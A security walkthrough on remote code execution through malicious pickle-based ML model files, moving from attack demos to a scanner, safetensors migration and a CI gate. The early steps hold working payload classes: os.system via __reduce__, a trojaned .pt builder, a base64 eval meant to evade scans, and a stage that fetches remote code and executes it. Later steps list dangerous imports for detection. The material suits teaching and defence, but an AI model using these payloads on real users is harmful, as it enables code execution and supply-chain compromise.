Model Serialization RCE
Remote code execution through malicious model files using pickle deserialization, safetensors manipulation, and other model serialization format vulnerabilities.
Machine learning models are typically saved as serialized Python objects using formats like pickle (.pkl, .pt, .bin). Python's pickle module can deserialize arbitrary Python objects, including objects whose construction triggers code execution. A malicious model file can execute arbitrary code the moment it is loaded with torch.load(), pickle.load(), or joblib.load(). This is not a bug in pickle -- it is a fundamental design property. This walkthrough demonstrates the vulnerability, builds detection tools, and covers migration to safer formats.
Step 1: Understanding Pickle Deserialization
Python's pickle protocol reconstructs objects by calling their __reduce__ method, which can return arbitrary callables with arbitrary arguments. This is the core of the vulnerability.
"""
Demonstrate how pickle deserialization executes arbitrary code.
WARNING: Only run in a sandboxed environment.
"""
import pickle
import io
class MaliciousPayload:
"""A class that executes code when unpickled.
When pickle reconstructs this object, it calls os.system()
with the provided command.
"""
def __init__(self, command: str):
self.command = command
def __reduce__(self):
"""Called during pickling to determine how to reconstruct the object.
Returns a tuple of (callable, args) that pickle will call
during deserialization.
"""
import os
return (os.system, (self.command,))
# Demonstrate the mechanism WITHOUT executing anything harmful
class SafeDemo:
"""Demonstrates the __reduce__ mechanism safely."""
def __reduce__(self):
# Instead of os.system, we use print to show the concept
return (print, ("PICKLE DESERIALIZATION EXECUTED THIS CODE",))
# Serialize and deserialize the safe demo
payload_bytes = pickle.dumps(SafeDemo())
print(f"Serialized payload: {len(payload_bytes)} bytes")
print("Deserializing...")
result = pickle.loads(payload_bytes)
# Output: "PICKLE DESERIALIZATION EXECUTED THIS CODE"
# Show what the serialized bytes contain
print(f"\nPickle opcodes preview:")
import pickletools
pickletools.dis(io.BytesIO(payload_bytes))Step 2: Creating Malicious Model Files
Demonstrate how a real PyTorch model file can carry a hidden payload.
"""
Create a PyTorch model file that contains both a legitimate model
and a hidden code execution payload.
WARNING: This creates files that execute code on load.
Only use in sandboxed environments for security research.
"""
import torch
import pickle
import io
import os
class TrojanedModel:
"""A model wrapper that executes a payload when deserialized.
The model functions normally after loading, making the trojan
difficult to detect through behavioral testing alone.
"""
def __init__(self, legitimate_model, payload_command: str):
self.model = legitimate_model
self.payload = payload_command
self._payload_executed = False
def __reduce__(self):
# Return a tuple that:
# 1. Executes the payload
# 2. Returns the legitimate model so everything appears normal
return (
self._reconstruct,
(self.model, self.payload),
)
@staticmethod
def _reconstruct(model, payload):
"""Called during deserialization. Executes payload, returns model."""
# In a real attack, this would be: os.system(payload)
# For this demo, we just log the attempt
print(f"[PAYLOAD WOULD EXECUTE]: {payload}")
# Return the legitimate model so the caller gets what they expect
return model
def create_trojan_model_file(
output_path: str,
payload_command: str = "echo 'RCE achieved' > /tmp/pwned.txt",
) -> dict:
"""Create a .pt file containing a trojaned model."""
# Create a legitimate small model
model = torch.nn.Sequential(
torch.nn.Linear(10, 64),
torch.nn.ReLU(),
torch.nn.Linear(64, 1),
)
# Wrap with trojan
trojaned = TrojanedModel(model.state_dict(), payload_command)
# Save as a normal .pt file
torch.save(trojaned, output_path)
file_size = os.path.getsize(output_path)
return {
"file": output_path,
"size_bytes": file_size,
"payload": payload_command,
"format": "PyTorch (.pt)",
}
# Create proof-of-concept (safe payload)
result = create_trojan_model_file(
"/tmp/trojaned_model.pt",
payload_command="echo 'Security test: RCE via model deserialization'",
)
print(f"Created trojaned model: {result['file']} ({result['size_bytes']} bytes)")
print(f"Payload: {result['payload']}")
print("\nWhen someone runs: model = torch.load('/tmp/trojaned_model.pt')")
print("The payload executes automatically.")Step 3: Advanced Payload Techniques
More sophisticated payloads that are harder to detect through static analysis.
"""
Advanced payload techniques that evade basic pickle scanning.
"""
import pickle
import base64
import zlib
class ObfuscatedPayload:
"""Payload that uses indirection to evade simple scanning.
Instead of directly calling os.system, this uses eval()
with an encoded command string.
"""
def __init__(self, command: str):
# Base64-encode the command to hide it from string scanning
self.encoded = base64.b64encode(command.encode()).decode()
def __reduce__(self):
# Use eval with base64 decoding to reconstruct the command
# This avoids having 'os.system' appear in the pickle stream
return (
eval,
(f"__import__('os').system(__import__('base64').b64decode('{self.encoded}').decode())",),
)
class MultiStagePayload:
"""A multi-stage payload that downloads and executes a second stage.
Stage 1 (in pickle): Download a script from a URL
Stage 2 (downloaded): The actual malicious payload
"""
def __init__(self, stage2_url: str):
self.url = stage2_url
def __reduce__(self):
# Stage 1: Use urllib to fetch and exec stage 2
code = f"""
import urllib.request
response = urllib.request.urlopen('{self.url}')
exec(response.read())
"""
return (exec, (code,))
class ChainedPayload:
"""Chain multiple operations during deserialization."""
def __reduce__(self):
# Use a lambda-like construct to chain operations
# This creates a reverse shell, exfiltrates data, etc.
operations = """
import socket, subprocess, os
# Example: create a marker file to prove execution
with open('/tmp/model_rce_proof.txt', 'w') as f:
f.write(f'RCE achieved at {__import__("datetime").datetime.now()}')
f.write(f'\\nUser: {os.getenv("USER", "unknown")}')
f.write(f'\\nCWD: {os.getcwd()}')
"""
return (exec, (operations,))
# Demonstrate obfuscation effectiveness
payload = ObfuscatedPayload("echo test")
serialized = pickle.dumps(payload)
# Show that 'os.system' does not appear in the serialized bytes
payload_str = serialized.decode("latin-1")
print(f"Contains 'os.system': {'os.system' in payload_str}")
print(f"Contains 'eval': {'eval' in payload_str}")
print(f"Serialized size: {len(serialized)} bytes")Step 4: Scanning Model Files for Malicious Content
Build tools to detect potentially malicious model files before loading them.
"""
Model file security scanner that detects malicious pickle content.
"""
import pickle
import pickletools
import io
import os
from pathlib import Path
from dataclasses import dataclass
from typing import Optional
@dataclass
class ScanResult:
file_path: str
is_safe: bool
risk_level: str # "safe", "suspicious", "dangerous"
dangerous_opcodes: list[str]
dangerous_imports: list[str]
file_format: str
recommendation: str
class ModelFileScanner:
"""Scan model files for malicious pickle content."""
# Opcodes that indicate potential code execution
DANGEROUS_OPCODES = {
"GLOBAL", "INST", "REDUCE", "BUILD",
"STACK_GLOBAL", "NEWOBJ", "NEWOBJ_EX",
}
# Modules/functions that should never appear in model files
DANGEROUS_IMPORTS = {
"os", "subprocess", "sys", "shutil", "socket",
"http", "urllib", "requests", "paramiko",
"builtins.eval", "builtins.exec", "builtins.compile",
"builtins.__import__", "webbrowser", "ctypes",
"pty", "commands", "pdb",
}
# Safe modules expected in model files
SAFE_IMPORTS = {
"torch", "numpy", "collections", "typing",
"_codecs", "copyreg", "_rebuild",
}
def scan_file(self, file_path: str) -> ScanResult:
"""Scan a model file for potential threats."""
path = Path(file_path)
if path.suffix == ".safetensors":
return ScanResult(
file_path=file_path,
is_safe=True,
risk_level="safe",
dangerous_opcodes=[],
dangerous_imports=[],
file_format="safetensors",
recommendation="Safe format: safetensors does not support code execution",
)
if path.suffix in (".onnx",):
return ScanResult(
file_path=file_path,
is_safe=True,
risk_level="safe",
dangerous_opcodes=[],
dangerous_imports=[],
file_format="ONNX",
recommendation="Safe format: ONNX is a declarative format",
)
# Pickle-based formats
return self._scan_pickle_file(file_path)
def _scan_pickle_file(self, file_path: str) -> ScanResult:
"""Deep scan of pickle-based model files."""
dangerous_ops = []
dangerous_imports = []
try:
with open(file_path, "rb") as f:
data = f.read()
# Analyze pickle opcodes
ops = list(pickletools.genops(io.BytesIO(data)))
for opcode, arg, pos in ops:
if opcode.name in self.DANGEROUS_OPCODES:
dangerous_ops.append(f"{opcode.name} at position {pos}")
if opcode.name in ("GLOBAL", "STACK_GLOBAL") and arg:
module_func = str(arg)
module = module_func.split(".")[0] if "." in module_func else module_func.split(" ")[0]
if module not in self.SAFE_IMPORTS:
for dangerous in self.DANGEROUS_IMPORTS:
if dangerous in module_func.lower():
dangerous_imports.append(module_func)
break
except Exception as e:
return ScanResult(
file_path=file_path,
is_safe=False,
risk_level="suspicious",
dangerous_opcodes=[],
dangerous_imports=[],
file_format="unknown",
recommendation=f"Could not parse file: {e}",
)
# Determine risk level
if dangerous_imports:
risk = "dangerous"
safe = False
rec = f"BLOCK: Found dangerous imports: {', '.join(dangerous_imports[:5])}"
elif len(dangerous_ops) > 10:
risk = "suspicious"
safe = False
rec = "WARNING: Unusual number of code execution opcodes"
else:
risk = "safe"
safe = True
rec = "No obvious threats detected (but pickle is inherently unsafe)"
return ScanResult(
file_path=file_path,
is_safe=safe,
risk_level=risk,
dangerous_opcodes=dangerous_ops[:10],
dangerous_imports=dangerous_imports,
file_format="pickle",
recommendation=rec,
)
# Usage
scanner = ModelFileScanner()
# Scan the trojaned model we created earlier
if os.path.exists("/tmp/trojaned_model.pt"):
result = scanner.scan_file("/tmp/trojaned_model.pt")
print(f"File: {result.file_path}")
print(f"Safe: {result.is_safe}")
print(f"Risk: {result.risk_level}")
print(f"Dangerous imports: {result.dangerous_imports}")
print(f"Recommendation: {result.recommendation}")Step 5: Using Fickling for Deep Analysis
"""
Use the fickling library for deeper pickle security analysis.
Fickling provides both static analysis and safe unpickling.
"""
from pathlib import Path
def analyze_with_fickling(file_path: str) -> dict:
"""Deep analysis of pickle files using fickling."""
try:
import fickling
from fickling.analysis import check_safety
result = check_safety(file_path)
return {
"file": file_path,
"is_likely_safe": result.is_likely_safe,
"severity": result.severity,
"issues": [str(issue) for issue in result.issues],
"analysis_complete": True,
}
except ImportError:
return {
"file": file_path,
"error": "fickling not installed: pip install fickling",
"analysis_complete": False,
}
except Exception as e:
return {
"file": file_path,
"error": str(e),
"analysis_complete": False,
}
def safe_model_load(file_path: str) -> dict:
"""Attempt to safely load a model file with multiple strategies."""
path = Path(file_path)
strategies = []
# Strategy 1: safetensors (preferred)
if path.suffix == ".safetensors":
try:
from safetensors.torch import load_file
tensors = load_file(file_path)
strategies.append({"method": "safetensors", "success": True})
return {"loaded": True, "method": "safetensors", "strategies": strategies}
except Exception as e:
strategies.append({"method": "safetensors", "error": str(e)})
# Strategy 2: torch.load with weights_only=True (PyTorch 2.0+)
if path.suffix in (".pt", ".pth", ".bin"):
try:
import torch
state_dict = torch.load(file_path, weights_only=True)
strategies.append({"method": "weights_only", "success": True})
return {"loaded": True, "method": "weights_only", "strategies": strategies}
except Exception as e:
strategies.append({"method": "weights_only", "error": str(e)})
# Strategy 3: Scan then load (last resort)
scanner = ModelFileScanner()
scan_result = scanner.scan_file(file_path)
strategies.append({"method": "scan_then_load", "scan": scan_result.risk_level})
if scan_result.is_safe:
return {"loaded": False, "method": "scan_passed_but_not_loaded", "strategies": strategies}
else:
return {"loaded": False, "method": "blocked_by_scan", "strategies": strategies}
# Import the scanner from previous step for reference
from dataclasses import dataclass
print("Fickling analysis and safe loading ready")Step 6: Migrating to Safe Formats
"""
Tools and patterns for migrating from pickle to safe serialization formats.
"""
import torch
from pathlib import Path
def convert_pt_to_safetensors(
input_path: str,
output_path: str,
) -> dict:
"""Convert a PyTorch .pt file to safetensors format.
safetensors only stores tensors (no arbitrary Python objects),
making it immune to deserialization attacks.
"""
try:
from safetensors.torch import save_file
# Load with weights_only for safety
try:
state_dict = torch.load(input_path, weights_only=True)
except Exception:
print("WARNING: weights_only=True failed, file may contain non-tensor data")
print("Attempting unsafe load in sandboxed context...")
state_dict = torch.load(input_path, map_location="cpu")
# If result is a model (not state_dict), extract state_dict
if hasattr(state_dict, "state_dict"):
state_dict = state_dict.state_dict()
elif not isinstance(state_dict, dict):
raise ValueError(f"Unexpected type: {type(state_dict)}")
# Filter to only tensor values
tensor_dict = {
k: v for k, v in state_dict.items()
if isinstance(v, torch.Tensor)
}
save_file(tensor_dict, output_path)
return {
"input": input_path,
"output": output_path,
"tensors_converted": len(tensor_dict),
"original_keys": len(state_dict),
"success": True,
}
except ImportError:
return {"error": "safetensors not installed: pip install safetensors"}
except Exception as e:
return {"error": str(e), "success": False}
def batch_convert_directory(
input_dir: str,
output_dir: str,
extensions: tuple = (".pt", ".pth", ".bin"),
) -> list[dict]:
"""Convert all pickle-based model files in a directory."""
in_path = Path(input_dir)
out_path = Path(output_dir)
out_path.mkdir(parents=True, exist_ok=True)
results = []
for model_file in in_path.rglob("*"):
if model_file.suffix in extensions:
output_file = out_path / model_file.with_suffix(".safetensors").name
result = convert_pt_to_safetensors(str(model_file), str(output_file))
results.append(result)
status = "OK" if result.get("success") else "FAIL"
print(f" {model_file.name}: {status}")
return results
print("Model format conversion tools ready")Step 7: CI/CD Security Integration
"""
Integrate model file scanning into CI/CD pipelines.
"""
import json
import sys
from pathlib import Path
from dataclasses import asdict
def ci_scan_models(directory: str, fail_on_risk: str = "suspicious") -> int:
"""Scan all model files in a directory for CI/CD pipelines.
Returns exit code 0 (pass) or 1 (fail) for CI integration.
"""
scanner = ModelFileScanner()
risk_levels = {"safe": 0, "suspicious": 1, "dangerous": 2}
threshold = risk_levels.get(fail_on_risk, 1)
model_extensions = {".pt", ".pth", ".pkl", ".bin", ".joblib", ".safetensors", ".onnx"}
results = []
max_risk = 0
for path in Path(directory).rglob("*"):
if path.suffix in model_extensions:
result = scanner.scan_file(str(path))
results.append(asdict(result))
risk_num = risk_levels.get(result.risk_level, 1)
max_risk = max(max_risk, risk_num)
icon = "PASS" if result.is_safe else "FAIL"
print(f" [{icon}] {path.name}: {result.risk_level}")
if not result.is_safe:
print(f" {result.recommendation}")
# Output results as JSON for CI artifacts
report = {
"total_files": len(results),
"dangerous": sum(1 for r in results if r["risk_level"] == "dangerous"),
"suspicious": sum(1 for r in results if r["risk_level"] == "suspicious"),
"safe": sum(1 for r in results if r["risk_level"] == "safe"),
"results": results,
}
with open("model_scan_report.json", "w") as f:
json.dump(report, f, indent=2)
passed = max_risk < threshold
print(f"\n{'PASSED' if passed else 'FAILED'}: {report['safe']} safe, "
f"{report['suspicious']} suspicious, {report['dangerous']} dangerous")
return 0 if passed else 1
# GitHub Actions integration example
GITHUB_ACTION_YAML = """
# .github/workflows/model-security.yml
name: Model File Security Scan
on:
pull_request:
paths:
- 'models/**'
- '*.pt'
- '*.pkl'
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.11'
- run: pip install fickling safetensors torch
- run: python scripts/scan_models.py models/
- uses: actions/upload-artifact@v4
if: always()
with:
name: model-scan-report
path: model_scan_report.json
"""
print("CI/CD model scanning integration ready")Step 8: Comprehensive Defense Strategy
"""
Complete defense strategy for model file security.
"""
from dataclasses import dataclass
from typing import Optional
from pathlib import Path
@dataclass
class ModelSecurityPolicy:
allowed_formats: list[str]
require_scanning: bool
require_provenance: bool
sandbox_loading: bool
max_file_size_mb: int
RECOMMENDED_POLICY = ModelSecurityPolicy(
allowed_formats=["safetensors", "onnx"],
require_scanning=True,
require_provenance=True,
sandbox_loading=True,
max_file_size_mb=5000,
)
class ModelSecurityGateway:
"""Enforce security policy for model file loading."""
def __init__(self, policy: ModelSecurityPolicy):
self.policy = policy
def validate_and_load(self, file_path: str) -> dict:
"""Validate a model file against security policy before loading."""
path = Path(file_path)
checks = []
# Check 1: File format
format_safe = path.suffix.lstrip(".") in self.policy.allowed_formats
checks.append({"check": "format", "passed": format_safe,
"detail": f"Format: {path.suffix}"})
if not format_safe and self.policy.require_scanning:
# Check 2: Deep scan for pickle files
scanner = ModelFileScanner()
scan = scanner.scan_file(file_path)
checks.append({"check": "scan", "passed": scan.is_safe,
"detail": scan.recommendation})
# Check 3: File size
size_mb = path.stat().st_size / (1024 * 1024)
size_ok = size_mb <= self.policy.max_file_size_mb
checks.append({"check": "size", "passed": size_ok,
"detail": f"{size_mb:.1f} MB"})
all_passed = all(c["passed"] for c in checks)
return {
"file": file_path,
"approved": all_passed,
"checks": checks,
"recommendation": "Load approved" if all_passed else "Loading blocked by security policy",
}
gateway = ModelSecurityGateway(RECOMMENDED_POLICY)
print("Model security gateway ready")
print(f"Policy: {RECOMMENDED_POLICY}")Related Topics
- Model Hub Supply Chain Attack -- How malicious models reach users
- Dependency Confusion in ML -- Package-level supply chain attacks
- Inference Endpoint Exploitation -- Post-deployment attack surface
Why does torch.load() on an untrusted file pose a critical security risk?